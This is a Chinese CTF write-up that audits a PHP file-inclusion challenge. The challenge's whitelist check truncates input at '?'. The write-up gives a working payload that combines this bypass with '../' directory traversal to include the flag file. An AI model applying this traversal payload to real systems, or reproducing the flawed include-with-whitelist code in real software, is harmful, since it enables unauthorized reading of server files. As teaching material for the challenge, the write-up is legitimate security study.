打开一个笑脸。查看源代码,提示source.php,打开发现代码
<?php highlight_file(__FILE__);
class emmm { public static function checkFile(&$page)
{ $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page))
{ echo "you can't see it"; return false; }
if (in_array($page, $whitelist))
{ return true; }
$_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') );
if (in_array($_page, $whitelist))
{ return true; }
$_page = urldecode($page);
$_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') );
if (in_array($_page, $whitelist))
{ return true; }
echo "you can't see it"; return false; } }
if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) )
{ include $_REQUEST['file']; exit; } else { echo "
"; }
进行代码审计
先看下面主体,一道文件包含,要求file不为空,要是字符,还要满足checkFile()是一个白名单;
看上面代码,发现还有一个hint.php,打开发现 flag not here, and flag in ffffllllaaaagggg 出现flag文件。
if (in_array($page, $whitelist)) //$page需要在whitelist里,只能是source和hint
$_page = mb_substr( $page, 0, mb_strpos($page . ‘?’, ‘?’) //返回出现?的位置, );//截取?号前面那段 if (in_array($_page, $whitelist)) //看是否是source或hint return true; 关键在这段代码 满足白名单后进行目录穿越
?file=source.php?/../../../../ffffllllaaaagggg 即可获得flag